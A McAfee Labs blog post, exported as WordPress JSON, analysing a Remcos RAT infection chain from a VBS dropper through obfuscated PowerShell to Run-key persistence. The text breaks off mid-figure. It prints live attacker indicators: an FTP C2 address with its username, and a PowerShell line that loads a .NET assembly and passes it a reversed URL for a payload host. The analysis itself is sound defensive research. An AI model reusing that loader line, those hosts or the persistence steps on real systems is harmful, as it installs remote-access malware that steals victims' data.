{"id":206036,"date":"2024-12-11T00:38:14","date_gmt":"2024-12-11T08:38:14","guid":{"rendered":"https:\/\/www.mcafee.com\/blogs\/?p=206036"},"modified":"2025-06-06T01:40:15","modified_gmt":"2025-06-06T08:40:15","slug":"the-stealthy-stalker-remcos-rat","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/","title":{"rendered":"The Stealthy Stalker: Remcos RAT"},"content":{"rendered":"<p style=\"font-weight: 400;\"><em>Authored By Sakshi Jaiswal, Anuradha M<\/em><\/p>\n<p style=\"font-weight: 400;\">In Q3 2024, McAfee Labs identified a sharp rise in the Remcos RAT threat. It has emerged as a significant threat in the world of cybersecurity, gaining traction with its ability to infiltrate systems and compromise sensitive data. This malware, often delivered through phishing emails and malicious attachments, allows cybercriminals to remotely control infected machines, making it a powerful tool for espionage, data theft, and system manipulation. As cyberattacks become more sophisticated, understanding the mechanisms behind RemcosRAT and adopting effective security measures are crucial to protecting your systems from this growing threat. This blog presents a technical analysis of two RemcosRAT variants<\/p>\n<p style=\"text-align: center;\"><strong><em>The heat map below illustrates the prevalence of Remcos in the field in Q3,2024<\/em><\/strong><\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206037\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure1.png\" alt=\"\" width=\"756\" height=\"413\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure1.png 756w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure1-300x164.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure1-205x112.png 205w\" sizes=\"auto, (max-width: 756px) 100vw, 756px\" \/><\/p>\n<figure><img style=\"width: 100%;\" \/><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\">Figure 1: Remcos heat map<\/span><\/figcaption><\/figure>\n<h2 style=\"font-weight: 400;\"><strong>Variant 1: <\/strong><\/h2>\n<p style=\"font-weight: 400;\">In the first variant of Remcos, executing a VBS file triggers a highly obfuscated PowerShell script that downloads multiple files from a command-and-control (C2) server. These files are then executed, ultimately leading to their injection into RegAsm.exe, a legitimate Microsoft .NET executable.<\/p>\n<h2 style=\"font-weight: 400;\"><strong>Infection Chain<\/strong><\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206052\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure2.png\" alt=\"\" width=\"910\" height=\"343\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure2.png 910w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure2-300x113.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure2-768x289.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure2-205x77.png 205w\" sizes=\"auto, (max-width: 910px) 100vw, 910px\" \/><img style=\"width: 100%;\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\">Figure 2: Infection Chain of variant 1<\/span><\/figcaption><\/figure>\n<h2 style=\"font-weight: 400;\"><strong>Analysis:<\/strong><\/h2>\n<p style=\"font-weight: 400;\">Executing the VBS file initially triggers a Long-Obfuscated PowerShell command.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206622\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure41.png\" alt=\"\" width=\"1888\" height=\"1005\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure41.png 1888w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure41-300x160.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure41-1024x545.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure41-768x409.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure41-1536x818.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure41-205x109.png 205w\" sizes=\"auto, (max-width: 1888px) 100vw, 1888px\" \/><img style=\"width: 100%;\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 3: Obfuscated PowerShell command<\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">It uses multi-layer obfuscation, and after de-obfuscation, below is the final readable content.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206067\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure4.png\" alt=\"\" width=\"1358\" height=\"687\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure4.png 1358w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure4-300x152.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure4-1024x518.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure4-768x389.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure4-205x104.png 205w\" sizes=\"auto, (max-width: 1358px) 100vw, 1358px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\">Figure 4: De-Obfuscated code<\/span><\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">The de-obfuscated PowerShell script performs the following actions:<\/p>\n<ol style=\"font-weight: 400;\">\n<li>Firstly, the script checks if the PowerShell version is 2.0. then the file will be downloaded from Googledrive \u201c&#8217;<a href=\"https:\/\/drive.google.com\/uc?export=download&amp;id=\">https:\/\/drive.google.com\/uc?export=download&amp;id=<\/a>&#8216;\u201c in Temp location. and if PowerShell version is not 2.0 then it downloads string from ftp server.<\/li>\n<li>It creates a copy of itself in the startup location &#8211; <strong>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\<\/strong><\/li>\n<\/ol>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206082\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure5.png\" alt=\"\" width=\"917\" height=\"241\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure5.png 917w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure5-300x79.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure5-768x202.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure5-205x54.png 205w\" sizes=\"auto, (max-width: 917px) 100vw, 917px\" \/><\/p>\n<figure><img style=\"width: 100%;\" \/><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 5: Self-copy location<\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<ol start=\"3\">\n<li>In this case, since the PowerShell version is not 2.0, it will download strings from the FTP server.<\/li>\n<li>Uses FTP to download DLL01.txt file, from \u201c<a href=\"ftp:\/\/desckvbrat1@ftp.desckvbrat.com.br\/Upcrypter\/01\/DLL01.txt\">ftp:\/\/desckvbrat1@ftp.desckvbrat.com.br\/Upcrypter\/01\/DLL01.txt<\/a>\u201d with the username:desckvbrat1 and password: *******************as mentioned in the PowerShell script. Using FileZilla with the provided username and password to download files.<\/li>\n<\/ol>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206097\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure6.png\" alt=\"\" width=\"1173\" height=\"933\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure6.png 1173w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure6-300x239.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure6-1024x814.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure6-768x611.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure6-162x129.png 162w\" sizes=\"auto, (max-width: 1173px) 100vw, 1173px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 6: Download file from FTP server<\/span><\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<ol start=\"5\">\n<li>It has 3 files DLL01.txt, Entry.txt and Rumpe.txt, which contains a URL that provides direct access to a snippet hosted on the PasteCode.io platform.<\/li>\n<\/ol>\n<p style=\"font-weight: 400;\"><strong>DLL01.txt File<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206112\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure7.png\" alt=\"\" width=\"1482\" height=\"127\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure7.png 1482w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure7-300x26.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure7-1024x88.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure7-768x66.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure7-205x18.png 205w\" sizes=\"auto, (max-width: 1482px) 100vw, 1482px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 7: DLL01.txt content<\/span><\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206127\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure8.png\" alt=\"\" width=\"1586\" height=\"795\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure8.png 1586w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure8-300x150.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure8-1024x513.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure8-768x385.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure8-1536x770.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure8-205x103.png 205w\" sizes=\"auto, (max-width: 1586px) 100vw, 1586px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 8: Snippet which is hosted on PasteCode.io of DLL01.txt<\/span><\/span><\/p>\n<p style=\"text-align: left;\"><span style=\"color: #333333; font-size: 16px;\"><br \/>\nThe snippet above is encoded, after decoding it, we are left with the ClassLibrary3.dll file.<\/span><\/p>\n<\/figcaption><\/figure>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206142\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure9.png\" alt=\"\" width=\"1020\" height=\"756\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure9.png 1020w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure9-300x222.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure9-768x569.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure9-174x129.png 174w\" sizes=\"auto, (max-width: 1020px) 100vw, 1020px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\">Figure 9: ClassLibrary3.dll<\/span><\/figcaption><\/figure>\n<p style=\"font-weight: 400;\"><strong>Rumpe.txt String<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206157\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure10.png\" alt=\"\" width=\"1482\" height=\"105\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure10.png 1482w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure10-300x21.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure10-1024x73.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure10-768x54.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure10-205x15.png 205w\" sizes=\"auto, (max-width: 1482px) 100vw, 1482px\" \/><img style=\"width: 100%;\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 10: Rumpe.txt content<\/span><\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206172\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure11.png\" alt=\"\" width=\"1572\" height=\"800\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure11.png 1572w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure11-300x153.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure11-1024x521.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure11-768x391.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure11-1536x782.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure11-205x104.png 205w\" sizes=\"auto, (max-width: 1572px) 100vw, 1572px\" \/><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000; font-size: 14px; text-align: center;\">Figure 11: Snippet which is hosted on PasteCode.io of Rumpe.txt<\/span><\/p>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">The snippet above is encoded, Decoding it generates ClassLibrary1.dll file.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206187\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure12.png\" alt=\"\" width=\"1008\" height=\"756\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure12.png 1008w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure12-300x225.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure12-768x576.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure12-172x129.png 172w\" sizes=\"auto, (max-width: 1008px) 100vw, 1008px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\">Figure 12: ClassLibrary1.dll<\/span><\/figcaption><\/figure>\n<p style=\"font-weight: 400;\"><strong>Entry.txt<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206202\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure13.png\" alt=\"\" width=\"1485\" height=\"118\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure13.png 1485w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure13-300x24.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure13-1024x81.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure13-768x61.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure13-205x16.png 205w\" sizes=\"auto, (max-width: 1485px) 100vw, 1485px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 13: Entry.txt content<\/span><\/span><\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206217\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure14.png\" alt=\"\" width=\"1580\" height=\"611\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure14.png 1580w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure14-300x116.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure14-1024x396.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure14-768x297.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure14-1536x594.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure14-205x79.png 205w\" sizes=\"auto, (max-width: 1580px) 100vw, 1580px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 14: Snippet which is hosted on PasteCode.io of Entry.txt<\/span><\/span><\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<ol>\n<li>Last line of long PowerShell script &#8211; [System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType(&#8216;ClassLibrary3.Class1&#8217;).GetMethod( &#8216;prFVI&#8217; ).Invoke( $null , [object[]] ( &#8216;<a href=\"http:\/\/txt.sz\/moc.gnitekrame-uotenok\/:sptth\">txt.sz\/moc.gnitekrame-uotenok\/\/:sptth<\/a>&#8216; , $hzwje , &#8216;true&#8217; ) ); This line loads a .NET assembly into the current application domain and invokes it.<\/li>\n<li>\u201c<a href=\"http:\/\/txt.sz\/moc.gnitekrame-uotenok\/:sptth\">txt.sz\/moc.gnitekrame-uotenok\/\/:sptth<\/a>\u201d The string is a reversed URL. When reversed, it becomes: <a href=\"https:\/\/koneotemarket.com\/zst.txt\">https:\/\/koneotemarket.com\/zst.txt<\/a>. The raw data hosted in that location is base64 encoded and stored in reversed order. Once decoded and reversed, the content is invoked for execution.<\/li>\n<\/ol>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206232\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure15.png\" alt=\"\" width=\"1295\" height=\"757\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure15.png 1295w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure15-300x175.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure15-1024x599.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure15-768x449.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure15-205x120.png 205w\" sizes=\"auto, (max-width: 1295px) 100vw, 1295px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 15: Base64 encoded Content<\/span><\/span><\/figcaption>&nbsp;<\/figure>\n<ol style=\"font-weight: 400;\">\n<li>After invocation, it creates a directory in <strong>AppData\/Local\/Microsoft<\/strong>, specifically within the <strong>LocalLow<\/strong> folder. It then creates another folder named <strong>&#8220;System Update&#8221;<\/strong> and places three files inside it.<\/li>\n<\/ol>\n<p style=\"font-weight: 400;\">The <strong>LocalLow <\/strong>folder is a directory in Windows used to store application data that requires low user permissions. It is located within the AppData folder. The two paths below show how the malware is using a very similar path to this legitimate windows path.<\/p>\n<p style=\"font-weight: 400;\">legitimate Path: C:\\Users\\&lt;YourUsername&gt;\\AppData\\LocalLow<\/p>\n<p style=\"font-weight: 400;\">Mislead Path: C:\\Users\\&lt;YourUsername&gt;\\AppData\\Local\\<strong>Microsoft\\LocalLow<\/strong><\/p>\n<p style=\"font-weight: 400;\">In this case, a <strong>LocalLow <\/strong>folder has been created inside the Microsoft directory to mislead users into believing it is a legitimate path for <strong>LocalLow<\/strong>.<\/p>\n<p style=\"font-weight: 400;\">A screenshot of the files dropped into the <strong>System Update folder<\/strong> within the misleading LocalLow directory highlights the tactic used to mimic legitimate Windows directories, intending to evade user suspicion.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206247\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure16.png\" alt=\"\" width=\"1722\" height=\"958\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure16.png 1722w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure16-300x167.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure16-1024x570.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure16-768x427.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure16-1536x855.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure16-205x114.png 205w\" sizes=\"auto, (max-width: 1722px) 100vw, 1722px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\">Figure 16: Screenshot of dropped files into System Update directory<\/span><\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">Content of x3.txt<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206262\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure17.png\" alt=\"\" width=\"1078\" height=\"153\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure17.png 1078w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure17-300x43.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure17-1024x145.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure17-768x109.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure17-205x29.png 205w\" sizes=\"auto, (max-width: 1078px) 100vw, 1078px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 17: x3.txt content<\/span><\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p>Then x2.ps1 is executed. Content of x2.ps1<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206277\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure18.png\" alt=\"\" width=\"1062\" height=\"132\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure18.png 1062w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure18-300x37.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure18-1024x127.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure18-768x95.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure18-205x25.png 205w\" sizes=\"auto, (max-width: 1062px) 100vw, 1062px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 18: x2.ps1 content<\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">The command adds a new registry entry in the Run key of the Windows Registry under HKCU (HKEY_CURRENT_USER). This entry ensures that a PowerShell script (yrnwr.ps1) located in the System Update folder inside the misleading LocalLow directory is executed at every user login.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206292\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure19.png\" alt=\"\" width=\"1337\" height=\"422\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure19.png 1337w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure19-300x95.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure19-1024x323.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure19-768x242.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure19-205x65.png 205w\" sizes=\"auto, (max-width: 1337px) 100vw, 1337px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 19: HKCU Run Registry entry for persistence<\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">After adding registry entry, it executes yrnwr.ps1 file. Content of yrnwr.ps1 which is obfuscated.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206307\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure20.png\" alt=\"\" width=\"1082\" height=\"602\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure20.png 1082w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure20-300x167.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure20-1024x570.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure20-768x427.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure20-205x114.png 205w\" sizes=\"auto, (max-width: 1082px) 100vw, 1082px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\">Figure 20: Obfuscated PowerShell content<\/span><\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">After Decoding yrnwr.ps1<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206322\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure21.png\" alt=\"\" width=\"1482\" height=\"427\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure21.png 1482w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure21-300x86.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure21-1024x295.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure21-768x221.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure21-205x59.png 205w\" sizes=\"auto, (max-width: 1482px) 100vw, 1482px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 21: De-obfuscated PowerShell content<\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206337\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure22.png\" alt=\"\" width=\"1405\" height=\"80\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure22.png 1405w, 